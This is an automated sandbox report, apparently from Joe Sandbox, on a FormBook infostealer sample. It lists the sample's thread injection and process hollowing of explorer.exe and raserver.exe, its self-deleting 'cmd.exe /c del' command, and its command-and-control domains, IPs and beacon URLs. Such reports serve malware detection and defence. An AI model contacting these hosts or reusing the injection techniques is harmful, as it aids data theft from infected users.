          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04D2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 13_2_04C8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.thenorthgoldline.com
          Source: C:\Windows\explorer.exeDomain query: www.cochez.club
          Source: C:\Windows\explorer.exeDomain query: www.vermogenswerte.com
          Source: C:\Windows\explorer.exeDomain query: www.aizaibali.com
          Source: C:\Windows\explorer.exeDomain query: www.extinctionbrews.com
          Source: C:\Windows\explorer.exeNetwork Connect: 95.215.210.10 80
          Source: C:\Windows\explorer.exeDomain query: www.boatrace-life04.net
          Source: C:\Windows\explorer.exeNetwork Connect: 172.104.157.41 80
          Source: C:\Windows\explorer.exeDomain query: www.cindywillardrealtor.com
          Source: C:\Windows\explorer.exeDomain query: www.wideawakemomma.com
          Source: C:\Windows\explorer.exeDomain query: www.livegaming.store
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.81.221 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.88.31.204 80
          Source: C:\Windows\explorer.exeDomain query: www.saludflv.info
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Users\user\Desktop\pMbPS8nCm1.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: EB0000
          Source: C:\Users\user\Desktop\pMbPS8nCm1.exeProcess created: C:\Users\user\Desktop\pMbPS8nCm1.exe 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe'
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000000.251221123.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000000.283537676.0000000001640000.00000002.00000001.sdmp, raserver.exe, 0000000D.00000002.509596588.00000000034E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion2Input Capture1Security Software Discovery121Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 452687 Sample: pMbPS8nCm1.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 35 www.melodezu.com 2->35 37 www.garimpeirastore.online 2->37 39 melodezu.com 2->39 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 11 pMbPS8nCm1.exe 2->11         started        signatures3 process4 signatures5 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 14 pMbPS8nCm1.exe 11->14         started        process6 signatures7 65 Modifies the context of a thread in another process (thread injection) 14->65 67 Maps a DLL or memory area into another process 14->67 69 Sample uses process hollowing technique 14->69 71 Queues an APC in another process (thread injection) 14->71 17 explorer.exe 14->17 injected process8 dnsIp9 29 cochez.club 95.215.210.10, 49734, 80 NEWIT-ASRU Russian Federation 17->29 31 vermogenswerte.com 172.104.157.41, 49739, 80 LINODE-APLinodeLLCUS United States 17->31 33 14 other IPs or domains 17->33 43 System process connects to network (likely due to code injection or exploit) 17->43 21 raserver.exe 12 17->21         started        signatures10 process11 dnsIp12 41 www.aizaibali.com 21->41 53 Modifies the context of a thread in another process (thread injection) 21->53 55 Maps a DLL or memory area into another process 21->55 57 Tries to detect virtualization through RDTSC time measurements 21->57 25 cmd.exe 1 21->25         started        signatures13 process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pMbPS8nCm1.exe27%VirustotalBrowse
          pMbPS8nCm1.exe41%ReversingLabsWin32.Trojan.Caynamer
          pMbPS8nCm1.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          13.2.raserver.exe.302d450.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.2.pMbPS8nCm1.exe.5a0000.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.pMbPS8nCm1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.pMbPS8nCm1.exe.6f0000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.pMbPS8nCm1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.raserver.exe.5167960.6.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          www.extinctionbrews.com/dy8g/0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.aizaibali.com/100%Avira URL Cloudmalware
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh100%Avira URL Cloudmalware
          http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          extinctionbrews.com
          34.102.136.180
          truefalse
            unknown
            wideawakemomma.com
            34.102.136.180
            truefalse
              unknown
              vermogenswerte.com
              172.104.157.41
              truetrue
                unknown
                www.aizaibali.com
                154.88.31.204
                truetrue
                  unknown
                  cochez.club
                  95.215.210.10
                  truetrue
                    unknown
                    www.garimpeirastore.online
                    209.99.40.222
                    truetrue
                      unknown
                      melodezu.com
                      64.227.87.162
                      truetrue
                        unknown
                        cindywillardrealtor.com
                        34.102.136.180
                        truefalse
                          unknown
                          825610.parkingcrew.net
                          75.2.81.221
                          truefalse
                            high
                            www.thenorthgoldline.com
                            unknown
                            unknowntrue
                              unknown
                              www.boatrace-life04.net
                              unknown
                              unknowntrue
                                unknown
                                www.melodezu.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.cochez.club
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.cindywillardrealtor.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.wideawakemomma.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.vermogenswerte.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.livegaming.store
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.extinctionbrews.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.saludflv.info
                                              unknown
                                              unknowntrue
                                                unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.cochez.club/dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.extinctionbrews.com/dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxhfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.thenorthgoldline.com/dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.cindywillardrealtor.com/dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxhfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.vermogenswerte.com/dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxhtrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                www.extinctionbrews.com/dy8g/true
                                                • Avira URL Cloud: safe
                                                low
                                                http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxhfalse
                                                • Avira URL Cloud: malware
                                                unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.tiro.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.goodfont.co.krexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comlexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.typography.netDexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://fontfabrik.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referraserver.exe, 0000000D.00000002.513072851.00000000052E2000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.fonts.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.aizaibali.com/raserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000003.00000000.272445649.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGNraserver.exe, 0000000D.00000002.509297575.0000000003078000.00000004.00000020.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      95.215.210.10
                                                                      cochez.clubRussian Federation
                                                                      49055NEWIT-ASRUtrue
                                                                      172.104.157.41
                                                                      vermogenswerte.comUnited States
                                                                      63949LINODE-APLinodeLLCUStrue
                                                                      34.102.136.180
                                                                      extinctionbrews.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      75.2.81.221
                                                                      825610.parkingcrew.netUnited States
                                                                      16509AMAZON-02USfalse
                                                                      154.88.31.204
                                                                      www.aizaibali.comSeychelles
                                                                      40065CNSERVERSUStrue

                                                                      General Information

                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                      Analysis ID:452687
                                                                      Start date:22.07.2021
                                                                      Start time:18:03:21
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:light
                                                                      Sample file name:pMbPS8nCm1.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/0@13/5
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 29.3% (good quality ratio 25.4%)
                                                                      • Quality average: 71.1%
                                                                      • Quality standard deviation: 33.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      Show All
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 23.35.236.56, 20.82.209.183, 23.216.77.132, 23.216.77.146, 13.107.4.50, 51.103.5.186, 40.112.88.60, 80.67.82.211, 80.67.82.235
